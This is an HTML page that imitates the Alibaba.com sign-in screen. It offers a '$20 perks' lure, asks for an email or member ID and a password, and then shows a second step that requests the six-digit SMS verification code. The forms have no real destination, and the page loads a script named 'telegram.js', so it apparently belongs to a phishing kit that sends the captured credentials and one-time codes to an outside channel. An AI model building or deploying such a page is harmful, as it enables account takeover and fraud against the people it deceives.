<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta property="og:image" content="img/download.png">
        <link rel="stylesheet" href="css/style.css">
        <link rel="icon" href="img/download.png" type="image/png">
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
        <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
        <title>
            Alibaba.com Sign In
        </title> 

    </head>

    <body>

        <div class="top">
            <div>
                <img src="img/TB1pDDmmF67gK0jSZPfXXahhFXa-2814-380.png" width="150px">
            </div>
        </div>

        <div class="container-one">
            <div class="container-one-left">
                <center>
                    <h1>
                        Welcome perks await!
                    </h1>

                    <p>
                        Unlock US $20 perks for new users
                    </p>
                </center>
            </div>

            <div class="container-one-right">
                <form>
                    <div class="label">
                        Account
                    </div>

                    <div>
                        <input class="email-id" type="text" placeholder="Enter your email or member ID" required>
                    </div><br>

                    <div class="label">
                        Password
                    </div>

                    <div>
                        <input class="password" type="password" placeholder="Enter password" required>
                    </div>

                    <div class="flex">
                        <div></div>

                        <div class="forgot-pass">
                            Forgot Password?
                        </div>
                    </div>

                    <div>
                        <button class="sign-btn">
                            Sign in
                        </button>
                    </div>

                    <div class="flex">
                        <div class="label">
                            Sign in with:
                        </div>

                        <div class="forgot-pass">
                            <img src="img/download-removebg-preview.png" width="45px">
                            <img style="margin-right: 8px;" src="img/facebook.png" width="22px">
                            <img src="img/linkein.png" width="22px">
                        </div>
                    </div>
                </form>
            </div>

        </div>

        <div class="container-second-otp">
            <div class="second-flex">
                <div>
                    <i class="bi bi-info-circle-fill"></i>
                </div>

                <div>
                    To protect your account, please complete the verification.
                </div>

                <div onclick="closeOtp()">
                    <b class="x-lg">
                        X
                    </b>
                </div>
            </div>

            <div class="mobile">
                Mobile: xxxxxx
            </div>

            <div class="label">
                Verification Code:
            </div>

            <div>
                <input class="otp" type="tel" placeholder="6 digit" maxlength="6" required>
            </div><br>

            <div class="thrid-flex">
                <div>
                    <i class="bi bi-check-circle-fill"></i>
                </div>

                <div>
                    A verification code has been sent to your cell phone and
                     remains valid for 15 minutes. Please do not share this code with others.
                </div>
            </div>

            <center class="label">
                Code not received? Click here.
            </center>

            <div style="margin-top: 30px; text-align: left;">
                <input class="checkbox" type="checkbox">
            </div>
            <div>
                I trust this device, Don't verify my account on this device again.
            </div>

            <button class="sign-btn2">
                Sign in
            </button>

            <center class="last-text">
                Phone is not available? Click here to modify
            </center>
        </div>

        <script src="/custom/sweetalert2.js"></script>
        <script src="telegram.js"></script>
        <script src="js/main.js"></script>
    </body>
</html>